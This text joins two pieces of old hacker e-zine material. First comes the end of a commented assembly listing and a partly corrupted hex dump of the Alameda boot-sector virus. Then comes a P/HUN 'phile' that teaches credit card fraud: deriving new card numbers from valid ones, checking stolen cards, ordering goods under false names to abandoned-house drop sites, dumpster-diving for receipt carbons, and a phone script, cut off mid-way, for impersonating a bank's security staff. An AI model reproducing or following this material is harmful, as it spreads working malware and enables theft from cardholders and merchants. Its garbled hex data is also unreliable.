|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
; ON ENTRY AH:CX = LOOP COUNT ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
DELAY: SUB CX,CX ;
|
|||
|
|
|||
|
D_01: LOOP $ ;
|
|||
|
|
|||
|
SUB AH,1 ;
|
|||
|
|
|||
|
JNZ D_01 ;
|
|||
|
|
|||
|
RET ;
|
|||
|
|
|||
|
;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
A7DF4 DB 27H,00H,8,2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
COUNTER_1 DW 001CH
|
|||
|
|
|||
|
ALT_CTRL DW 0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
A7DFC DB 27H,0,8,2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
END
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
; Hexadecimal representation. ;
|
|||
|
|
|||
|
;-----------------------------------------------------------------------;
|
|||
|
|
|||
|
;7C00 FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13 z1@.P<.|{;@..[!.
|
|||
|
|
|||
|
;7C10 00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04 .wc-`..@....V4u.
|
|||
|
|
|||
|
;7C20 FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE ..x}.f.w9..|s$.N
|
|||
|
|
|||
|
;7C30 BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89 ?.{9..s$h.......
|
|||
|
|
|||
|
;7C40 E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01 c.J9.'8..M.r~i8.
|
|||
|
|
|||
|
;7C50 FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4 ....>$.?f|9..zs$
|
|||
|
|
|||
|
;7C60 C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4 G.$.-|..&.{Cda.D
|
|||
|
|
|||
|
;7C70 0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00 ..fa.Dfaks'...'.
|
|||
|
|
|||
|
;7C80 02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00 ..'...'...'...'.
|
|||
|
|
|||
|
;7C90 06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26 ..'...'.$.-|#&
|
|||
|
|
|||
|
;7CA0 09 5F 5E 07 1F 58 9D-EA 11 11 1 FB .Y_^..X.j.....{P
|
|||
|
|
|||
|
;7CB0 53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88 S.....z}d`.D%..<
|
|||
|
|
|||
|
;7CC0 1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E .u..ck.<8u..gk..
|
|||
|
|
|||
|
;7CD0 FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E {..u.<.t.<St...z
|
|||
|
|
|||
|
;7CE0 7D 1F 5B 58 9D EA 87 E9-00 F0 E9 EB 00 BA D8 03 }.[X.j.i.pik.:X.
|
|||
|
|
|||
|
;7CF0 B8 00 08 EE E8 F3 00 A3-FA 7D B0 03 CD 10 B4 02 ..nhs.#z}0.M.4.
|
|||
|
|
|||
|
;7D00 31 D2 88 F7 CD 10 B4 01-B9 07 06 CD 108 20 04 1R..4.9..M.8 .
|
|||
|
|
|||
|
;7D10 E8 D7 00 FA E6 20 8E C1-89 CF BE 80 7B B9 80 00 hW.zfA.O>.{9..
|
|||
|
|
|||
|
;7D20 FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8 |s$.YG.R}..f.8
|
|||
|
|
|||
|
;7D30 40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0 @..X.&.....8.p
|
|||
|
|
|||
|
;7D4 8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5 .X.>.ed!.t.M.e
|
|||
|
|
|||
|
;7D50 00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8 .p1@.X!..(.u..
|
|||
|
|
|||
|
;7D60 EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01 n~M.9..Q4.M.r.8
|
|||
|
|
|||
|
;7D70 02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7 ...;.|9..M.Ys.bg
|
|||
|
|
|||
|
;780 EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C k[..V4u|..>.|
|
|||
|
|
|||
|
;7D90 B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8 9f..w..|t-&..x
|
|||
|
|
|||
|
;7DA0 7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E };z|:..5.k.r..
|
|||
|
|
|||
|
;7DB0 C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9 B;.|1.8....r.9
|
|||
|
|
|||
|
;7DC0 01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F ..8..M.rV4M.h.
|
|||
|
|
|||
|
;7DD0 FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB ~&..x}k0}!x};
|
|||
|
|
|||
|
;7DE0 40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC @..[#r.iwIb~.l
|
|||
|
|
|||
|
;7DF0 01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02 .uyC'.....'...
|
|||
|
|
|||
|
;---------------------------------------------------------------------;
|
|||
|
|
|||
|
End of commented code for the Alameda College Boot Infector Virus. All
|
|||
|
|
|||
|
viruses are dangerous.I take no responsibility for damages, outbreaks, or
|
|||
|
|
|||
|
other ramifications caused by misuse. This phile is for educational purpose
|
|||
|
|
|||
|
only! I expect everyone to use caution and common sense when dealing with
|
|||
|
|
|||
|
viruses. Enjoy!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 4 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Vital Credit Card Information and Usage
|
|||
|
|
|||
|
|
|||
|
|
|||
|
or
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Fun with Numbers revision A
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Compiled, and made intelligible by The Sparrow
|
|||
|
|
|||
|
|
|||
|
|
|||
|
** MANY Thanks to Codebreaker; for without him I would be lost. (in JFK?)
|
|||
|
|
|||
|
A big thankyou to The White Rider for proof-reading this.
|
|||
|
|
|||
|
( If you find any mistakes, BLAME HIM!!! HAHAHA)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Hello to: Fry Guy ("You've got to hear about this new scam. . .")
|
|||
|
|
|||
|
Video Vindicator ("Fly down and let's go casing!")
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Completion Date: Tuesday, November Twenty-second, in the year of our Lord, one
|
|||
|
|
|||
|
thousand, nine hundred, eighty eight, 3:39 am.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Last Updated On: Tuesday, March Twenty-second, in the year of our Lord, one
|
|||
|
|
|||
|
thousand, nine hundred, eighty nine, 5:01 am.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The following is list of ideas and facts that have been brought together for
|
|||
|
|
|||
|
the sole purpose of educating those who lack this knowledge. In writing this, I
|
|||
|
|
|||
|
do not intend for the reader to use any information contained herein, but
|
|||
|
|
|||
|
rather to further his/her own education and provoke thought to perhaps better
|
|||
|
|
|||
|
the society we live in.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I. Card Types
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The first digit of the credit card number (henceforth referred to as CCN)
|
|||
|
|
|||
|
determines the credit card type. A simple list might be:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
First Digit of Credit Card Card Type
|
|||
|
|
|||
|
-------------------------- ---------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
3 American Express
|
|||
|
|
|||
|
4 Visa
|
|||
|
|
|||
|
5 Mastercard
|
|||
|
|
|||
|
6 Discover
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
II. Bank and Branch Numbers
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Sample Credit Card: 1234 567 890 123
|
|||
|
|
|||
|
^
|
|||
|
|
|||
|
|
|
|||
|
|
|||
|
Within the first group of numbers from the left [called Group 4] the Bank
|
|||
|
|
|||
|
name and branch are contained. We have already discovered that the first digit
|
|||
|
|
|||
|
of Group 4 reveals the card type. We will now look at how to decipher which
|
|||
|
|
|||
|
bank issued the card, and which branch of the bank the actual card holder banks
|
|||
|
|
|||
|
at. Look at the Second, Third, and Fourth digits of Group 4. These three
|
|||
|
|
|||
|
numbers tell which bank issued the card. A small list follows this paragraph,
|
|||
|
|
|||
|
although you can compile a list by yourself. Just glance at cards you get your
|
|||
|
|
|||
|
hands on which the bank name is printed, and record the information. [ Editor's
|
|||
|
|
|||
|
Note: This is a hard concept to explain, so let me give you an example. Lets
|
|||
|
|
|||
|
say Bank of Hicksville's group 4 Visa Credit Card reads 4560. (560 = Bank of
|
|||
|
|
|||
|
Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville, too. 4561 could
|
|||
|
|
|||
|
be Bank of Booniesville. So what I am trying to get across is that the next
|
|||
|
|
|||
|
bank in line doesn't HAVE to be 4570 -- it could be earlier in numbers. ]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
----------VISA
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Group 4 Bank Name
|
|||
|
|
|||
|
-------- ---------
|
|||
|
|
|||
|
4019 Bank of America
|
|||
|
|
|||
|
4024 Bank of America
|
|||
|
|
|||
|
4052 First Cincinatti
|
|||
|
|
|||
|
4060 Navy Federal Credit Union
|
|||
|
|
|||
|
4128 Citibank
|
|||
|
|
|||
|
4131 State Street Bank
|
|||
|
|
|||
|
4215 Marine Midland
|
|||
|
|
|||
|
4225 Chase Manhattan
|
|||
|
|
|||
|
4231 Chase Lincoln First Classic
|
|||
|
|
|||
|
4232 Chase Lincoln First Classic
|
|||
|
|
|||
|
4241 Nat. Westminester Bank
|
|||
|
|
|||
|
4250 First Chicago Bank
|
|||
|
|
|||
|
4271 Citibank Preferred
|
|||
|
|
|||
|
4302 H.H.B.C.
|
|||
|
|
|||
|
4310 Imperial Savings
|
|||
|
|
|||
|
4317 Gold Dome
|
|||
|
|
|||
|
4387 Bank One
|
|||
|
|
|||
|
4428 Bank of Hoven
|
|||
|
|
|||
|
4811 Bank of Hawaii
|
|||
|
|
|||
|
4897 Village bank of Cincinatti
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
----------Mastercards
|
|||
|
|
|||
|
-----------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Group 4 Bank Name
|
|||
|
|
|||
|
--------- ---------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5215 Marine Midland
|
|||
|
|
|||
|
5217 Manufacturers Hanover Trust
|
|||
|
|
|||
|
5233 Huntington Bank
|
|||
|
|
|||
|
5242 Chevy Chase Federal Savings
|
|||
|
|
|||
|
5254 Bank of America
|
|||
|
|
|||
|
5263 Chemical Bank
|
|||
|
|
|||
|
5273 Bank of America
|
|||
|
|
|||
|
5286 Chase Lincoln First
|
|||
|
|
|||
|
5317 Norwest
|
|||
|
|
|||
|
5323 Bank of New York
|
|||
|
|
|||
|
5329 Maryland Bank NA (MBNA)
|
|||
|
|
|||
|
5410 Citibank Preferred
|
|||
|
|
|||
|
5411 1st Fin. bank of Omaha
|
|||
|
|
|||
|
5414 Nat. Westminester Bank
|
|||
|
|
|||
|
5415 Colonial National Bank
|
|||
|
|
|||
|
5424 Citibank
|
|||
|
|
|||
|
5465 Chase Manhattan
|
|||
|
|
|||
|
5678 Marine Midland
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
III. Bank Codes [ International Bank or Interlink Numbers]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
These are used in checking credit. Later on, you will learn that while
|
|||
|
|
|||
|
checking the credit cards for the amount of credit, you will be prompted to
|
|||
|
|
|||
|
enter the Bank ID along with the Merchant ID. The bank IDs are, I believe, from
|
|||
|
|
|||
|
the following list. One note-- you cannot just choose any Bank ID and use it
|
|||
|
|
|||
|
with any merchant ID. They must correspond in some way. How, I don't know. I
|
|||
|
|
|||
|
THINK that a bank issues a merchant number to each of their customers. If you
|
|||
|
|
|||
|
try to use a merchant number with a bank number, and the merchant doesn't
|
|||
|
|
|||
|
actually use the bank that is specified by the bank number, you are going to
|
|||
|
|
|||
|
get some problems. (ie, the verification won't go through.) Again, I will state
|
|||
|
|
|||
|
that this is only a theory. The reason that I post this theory is to get minds
|
|||
|
|
|||
|
working. So far, no one has mentioned their ideas on the function of Bank
|
|||
|
|
|||
|
Codes. If you do happen to find out the true meaning of these numbers, please
|
|||
|
|
|||
|
get in touch with me so I can update this list. Thanks. One word- on VISA
|
|||
|
|
|||
|
credit cards, the bank IDs are the first 4 digits of the Card. For Mastercards,
|
|||
|
|
|||
|
however, they vary. A list follows:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Bank Bank Code
|
|||
|
|
|||
|
---- ---------
|
|||
|
|
|||
|
Chemical Bank 1263
|
|||
|
|
|||
|
Marine Midland 6207 [1207?]
|
|||
|
|
|||
|
Manufacturers Hanover Trust 1033
|
|||
|
|
|||
|
Citibank 1035
|
|||
|
|
|||
|
Huntington 1226
|
|||
|
|
|||
|
First Card Gold 1286
|
|||
|
|
|||
|
MBNA 6017
|
|||
|
|
|||
|
Chase Manhatten 1665
|
|||
|
|
|||
|
[ Bank from 5127 ] 1015
|
|||
|
|
|||
|
|
|||
|
|
|||
|
IV. "Group 3"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Sample Credit Card: 1234 5678 9012 3456
|
|||
|
|
|||
|
^
|
|||
|
|
|||
|
|
|
|||
|
|
|||
|
|
|
|||
|
|
|||
|
Group 3, or the second group on a credit card in from
|
|||
|
|
|||
|
the left, contains some VERY useful information about the card. This group
|
|||
|
|
|||
|
holds the information on the Maximum Expiration Date and the Maximum Credit
|
|||
|
|
|||
|
Limit. (I believe that you can all see the benefits of this.) This does not
|
|||
|
|
|||
|
mean, however, that the ACTUAL expiration date and ACTUAL credit limit are in
|
|||
|
|
|||
|
this group. What it means is this: When the different Credit Card Companies
|
|||
|
|
|||
|
issue Credit Cards to the consumer, he of course has a credit limit. And when
|
|||
|
|
|||
|
the Companies formulate credit cards, they create certain groups for certain
|
|||
|
|
|||
|
customers. That is, certain "groups" contain all the credit cards for people
|
|||
|
|
|||
|
with a credit limit between $x and $y. The same thing goes with the expiration
|
|||
|
|
|||
|
dates. Everyone whose card expires after m1/y1 and before m2/y2 has their
|
|||
|
|
|||
|
credit card in a certain group formulated by the company. For example:
|
|||
|
|
|||
|
My name is Joe Schmoe. My Visa credit card expires in January of the year 1999.
|
|||
|
|
|||
|
My credit limit on this card is $7,000. My credit card number (CCN) will
|
|||
|
|
|||
|
probably be in the same group as my brother-in-law Jack Koff whose card expires
|
|||
|
|
|||
|
in December of 1998 and whose credit limit is $6,000. BUT, our cards will be in
|
|||
|
|
|||
|
different groups entirely than my boss' whose card expires in June of 1995 and
|
|||
|
|
|||
|
whose credit limit is $40,000.
|
|||
|
|
|||
|
Back to the point of section IV: Lets say you have a credit card with a
|
|||
|
|
|||
|
known expiration date and known credit limit. Lets also say that you happen
|
|||
|
|
|||
|
upon ANOTHER credit card whose numbers are the same up until the last 2 groups.
|
|||
|
|
|||
|
(You and I see that these two cards were issued by the same bank and PROBABLY
|
|||
|
|
|||
|
have a credit limit in the same ball park and an expiration date not far from
|
|||
|
|
|||
|
each other. ) BUT, even though you have this new credit card, you lost the
|
|||
|
|
|||
|
expiration date and credit limit. GOSH! How are you going to use this card when
|
|||
|
|
|||
|
you don't know this information?? APROXIMATE! You have a general idea now, and
|
|||
|
|
|||
|
you can go from there.
|
|||
|
|
|||
|
One warning here: I have found that small groups of cards with high credit
|
|||
|
|
|||
|
limits are often hidden in between large groups of cards with very low credit
|
|||
|
|
|||
|
limits. For instance, lets look at this card: 4123 4567 8901 2345. From -4567
|
|||
|
|
|||
|
until 4600 in group 3 (from the right) gold cards may exist. But after 4600 and
|
|||
|
|
|||
|
before 4567, cards with credit limits of $500 exist. Kind of sucks, huh?? Just
|
|||
|
|
|||
|
wanted to make you aware of this.
|
|||
|
|
|||
|
Now, once you learn how to modify these without hurting the card, you have
|
|||
|
|
|||
|
increased your value as a carder by 100x. But be careful. Often when you modify
|
|||
|
|
|||
|
a card's group 3 to get a higher credit limit line of cards, you will find the
|
|||
|
|
|||
|
entire line is dead. Or, in other cases, just the original card you find is
|
|||
|
|
|||
|
dead, and all surrounding cards are valid with the new credit limits.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
V. "Group 2" & "Group 1"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
These two groups, or the last two groups on the credit card, are the
|
|||
|
|
|||
|
easiest to modify. By changing these in such a way, you can formulate new
|
|||
|
|
|||
|
credit cards simply by doing a little math in your head. These two groups
|
|||
|
|
|||
|
contain the IDentification codes. Later on in your carding careers, you might
|
|||
|
|
|||
|
find out how to change these, and thus, you have found the secret to a vault of
|
|||
|
|
|||
|
new and awaiting credit cards. I stress here that the only purpose that these
|
|||
|
|
|||
|
two groups serve is to differentiate between customers. If the first two groups
|
|||
|
|
|||
|
of two cards are the same and the last two groups of two cards are different,
|
|||
|
|
|||
|
the two cards were issued by the same bank and probably have similar credit
|
|||
|
|
|||
|
limits, but are of course issued to different people.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VI. Credit Card Verification
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Once you have a newly formulated or newly found Credit Card, you must
|
|||
|
|
|||
|
first check to see if it is valid before you distribute or use it. The reason
|
|||
|
|
|||
|
for this is this: Although you may not have faltered in your calculations, and
|
|||
|
|
|||
|
you created a credit card following the correct formula, the card may turn up
|
|||
|
|
|||
|
as invalid. This is because it has not been issued yet. Visa or Mastercard has
|
|||
|
|
|||
|
not issued that card to a customer yet. You are ahead of the credit card
|
|||
|
|
|||
|
company. (Don't you feel important??!) If this case arises, simply formulate a
|
|||
|
|
|||
|
new credit card from the original valid credit card, and check it once again.
|
|||
|
|
|||
|
There is no known way around this except to wait.
|
|||
|
|
|||
|
OKAY- you want to check your credit card and see how much money this
|
|||
|
|
|||
|
person has. There are many, many credit verifiers around. The easiest way to
|
|||
|
|
|||
|
get ahold of one is to go into any store which accepts credit cards and look on
|
|||
|
|
|||
|
the side of the machine that imprints the carbons with the credit card number,
|
|||
|
|
|||
|
etc. Or, look right on the wall next to the register. There should be a number
|
|||
|
|
|||
|
to call, a merchant number, and perhaps a bank number. Jot these down and head
|
|||
|
|
|||
|
on home. The format for these is usually different, but all have the basic idea
|
|||
|
|
|||
|
in mind. Call an operator of some sort, tell her the authorization information
|
|||
|
|
|||
|
that she asks for (bank number,merchant number, etc) and give her the card and
|
|||
|
|
|||
|
the amount for which to verify the card. She will check and let you know if it
|
|||
|
|
|||
|
has enough credit left. Simple. BUT***
|
|||
|
|
|||
|
|
|||
|
|
|||
|
******************* ONE NOTE **********************
|
|||
|
|
|||
|
When you check a card for a certain amount of money, that amount of money is
|
|||
|
|
|||
|
subtracted from the amount available on the card. For example, if a card has
|
|||
|
|
|||
|
$5,000 left on it, and you get ahold of it and check it for $2,000, you can
|
|||
|
|
|||
|
only spend $3,000 before it tells you that you don't have the necessary credit
|
|||
|
|
|||
|
to go through with a transaction.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VII. Purchasing Merchandise: The Real Story
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OKAY, now that you have a VALID credit card, you will most likely want to
|
|||
|
|
|||
|
get some newly acquired merchandise. This is all fine and dandy, but if you
|
|||
|
|
|||
|
don't know what you are doing, you can get yourself and most likely your
|
|||
|
|
|||
|
friends in a LOT of trouble.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
---------------------------------------------------------------------------
|
|||
|
|
|||
|
*** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A ***
|
|||
|
|
|||
|
*** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL. ***
|
|||
|
|
|||
|
*** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING***
|
|||
|
|
|||
|
*** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD ***
|
|||
|
|
|||
|
*** BLOW THE WHOLE SHOW !!! !!! !!! !!! !!! !!! !!! !!! !!! !!!***
|
|||
|
|
|||
|
---------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIRST- Let me clarify something. When you order something over the phone, and
|
|||
|
|
|||
|
the person selling you the items wants to know the actual Cardholder's name,
|
|||
|
|
|||
|
address, phone number, etc, you DO NOT have to give him/her the correct
|
|||
|
|
|||
|
information. [UNLESS: You do have to give the person correct information if
|
|||
|
|
|||
|
they have an online connection to a credit record bureau such as CBI or TRW. In
|
|||
|
|
|||
|
this case, as they can verify everything that you say in a matter of moments,
|
|||
|
|
|||
|
just do your best, get a new card, and never order from this company again. I
|
|||
|
|
|||
|
will not lie to you: some companies do have this capability. But if you stick
|
|||
|
|
|||
|
with little bussinesses who need your money, you'll do fine. ] Bullshit your
|
|||
|
|
|||
|
way through. Or hire a social engineer to do it for you. You do not even have
|
|||
|
|
|||
|
to give the correct expiration date! Almost Any expiration date will work as
|
|||
|
|
|||
|
long as it is at least one month ahead of the current month and it is not TOO
|
|||
|
|
|||
|
far ahead in time so that it jumped over the actual expiration date. (ie, if
|
|||
|
|
|||
|
the current date is 10/89, give the expiration date 11/89 -- simple) The
|
|||
|
|
|||
|
company from which you are buying things can not verify the extra information
|
|||
|
|
|||
|
YOU give them until after the order has been processed and the package shipped.
|
|||
|
|
|||
|
They have to get in touch with a Credit Union, which will be discussed later on
|
|||
|
|
|||
|
in this summary, to verify it all. * ALL THAT THEY CAN VERIFY PRONTO IS THAT
|
|||
|
|
|||
|
THE CREDIT CARD IS VALID, AND THAT IT HAS ENOUGH CREDIT TO PAY FOR THE
|
|||
|
|
|||
|
MERCHANDISE YOU ARE PURCHASING. * My suggestion, however, is that you give them
|
|||
|
|
|||
|
the phone number of a pay phone near your house. [ Or, if you want to REALLY
|
|||
|
|
|||
|
make sure things go smoothly, give them the number of a direct dial VMB local
|
|||
|
|
|||
|
to the shipping address. ] If they want to call you back, FINE. Ask them to do
|
|||
|
|
|||
|
so between the hours of X pm and Y pm. And, just pitch tent at the phone for a
|
|||
|
|
|||
|
few hours a night. No problem. They will almost always call right back, since
|
|||
|
|
|||
|
they don't want to inconvenience their customer who happens to be buying $6,000
|
|||
|
|
|||
|
worth of computers at the time. Understand?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECOND- Where should I ask have them ship it to, you ask? Fret not, my little
|
|||
|
|
|||
|
friend in carding. Before you call and order your things, first go out and find
|
|||
|
|
|||
|
an abandoned house. These still work best. Either one that has been moved out
|
|||
|
|
|||
|
of, and no one has moved into yet. Or, if you can, find one that is REALLY
|
|||
|
|
|||
|
abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN
|
|||
|
|
|||
|
CAN FIND!) Jot down this address. This is referred to as a drop site.
|
|||
|
|
|||
|
[ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they sign
|
|||
|
|
|||
|
for everything (UPS, etc) and bring some FAKE ID with you to open it up. Most
|
|||
|
|
|||
|
of the time, they will give you hastle, and verify EVERYTHING you give them. So
|
|||
|
|
|||
|
it is really not that easy to get one of these. At least try, though. ] OKAY,
|
|||
|
|
|||
|
give this address to the man or lady who is taking your order. Tell them this
|
|||
|
|
|||
|
is where you live. REMEMBER, they can not verify that you don't live there for
|
|||
|
|
|||
|
quite a while. They will send everything there. When the shipment comes (either
|
|||
|
|
|||
|
Overnight, Second Day, or whenever), pick it up (CASUALLY) and stroll home to
|
|||
|
|
|||
|
open your package. If it does not come, or if the salesperson gives you
|
|||
|
|
|||
|
trouble, don't worry. If it didn't come, it is because 1) It got intercepted by
|
|||
|
|
|||
|
the feds or 2) The company didn't process it because they did actually try to
|
|||
|
|
|||
|
verify your address, name, and phone number, thus delaying your shipment, but
|
|||
|
|
|||
|
saving themselves a lot of money. Just try another store until you find some
|
|||
|
|
|||
|
place that is easy to buy from.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
THIRD- I suggest that you do not furnish your household with carded items. It
|
|||
|
|
|||
|
is just not wise. Get a few things, if you like, and wait a little while. Sit
|
|||
|
|
|||
|
tight. When things cool down, you might want to get some more things. REMEMBER-
|
|||
|
|
|||
|
all things are good in proportion, but when you get out of that proportion (ie,
|
|||
|
|
|||
|
get greedy and order a new house) you will most definately get caught sometime
|
|||
|
|
|||
|
or another. Patience is the carder's best friend. (along, of course, with the
|
|||
|
|
|||
|
VISA formula... hehe)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPEICAL TALENT AT
|
|||
|
|
|||
|
SCHOOL, PARTIES, OR SOCIAL EVENTS. Not even to your best friends. ESPECIALLY
|
|||
|
|
|||
|
not to your best friends. They are the ones most likely to brag about you and
|
|||
|
|
|||
|
spread the word. This is the farthest thing from what you want. Keep it to
|
|||
|
|
|||
|
yourself, and if you must tell someone about it, either call Phone Sex, a
|
|||
|
|
|||
|
Bridge, or an Alaskan Operator. Those are your only choices, as no other carder
|
|||
|
|
|||
|
or phreak wants to hear about how good you actually are.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIFTH- I wouldn't advise making a bussiness out of this, either. Sure, if you
|
|||
|
|
|||
|
want to get a few dollars for things you order (and that you don't want
|
|||
|
|
|||
|
anymore) sell it and keep the money. But its purely asinine to take "orders"
|
|||
|
|
|||
|
from people for money. And even if you don't want money. Keep in mind that
|
|||
|
|
|||
|
Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a
|
|||
|
|
|||
|
fun experience to go through. Do you want to go to jail for 10 years, and never
|
|||
|
|
|||
|
again be able to get a good job because Joey down the street wanted to pay $10
|
|||
|
|
|||
|
for a new skateboard that retails for $75?? Thats what I thought. Your whole
|
|||
|
|
|||
|
goal in life, as long as you participate in the Underground Arts, is to keep a
|
|||
|
|
|||
|
low profile.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VIII. Getting Credit Car$s
|
|||
|
|
|||
|
|
|||
|
|
|||
|
There are a number of ways through which you can get credit cards.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIRST- Go trashing. That is, go in back of a bank, department store (make
|
|||
|
|
|||
|
sure it is not in a mall!), or other store which accepts credit cards. When the
|
|||
|
|
|||
|
coast is clear, jump in their trash bin. Rummage around a bit. Having a look
|
|||
|
|
|||
|
out might prove to be wise. What you are looking for are carbons - the carbon
|
|||
|
|
|||
|
paper which the salesperson throws out after a purchase has been made. Remember
|
|||
|
|
|||
|
these? It is the device that guarentees you (a legit customer) get a receipt of
|
|||
|
|
|||
|
your credit card purchase, and also that the store gets a copy for record
|
|||
|
|
|||
|
keeping. Once you find these, (and making sure you don't rip them) put them in
|
|||
|
|
|||
|
a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the
|
|||
|
|
|||
|
light, and copy down everything you think is important. Card Number, expiration
|
|||
|
|
|||
|
date, name, address, bank name, etc... Then BURN the carbons. This destroys all
|
|||
|
|
|||
|
evidence that you ever had them. From here, you are set. Order away!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECOND- If you have a friend that works in a store which performs credit
|
|||
|
|
|||
|
card transactions, you might save yourself the trouble of banana peals on your
|
|||
|
|
|||
|
head and ask him/her if they might not mind slipping the carbons into a bag
|
|||
|
|
|||
|
after they ring up a sale. (or have them copy everything down for you.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
THIRD- You might try bullshitting people and getting their cards. You have to
|
|||
|
|
|||
|
be VERY good, and the person has to be VERY stupid for this to work. In my
|
|||
|
|
|||
|
mind, it is a waste of time, and almost never works. (Because people where I
|
|||
|
|
|||
|
live are smart, of course..) I am presenting this to you in case you live in a
|
|||
|
|
|||
|
society of morons. Exploit every area that you possibly can. The conversation
|
|||
|
|
|||
|
might go something like this:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We
|
|||
|
|
|||
|
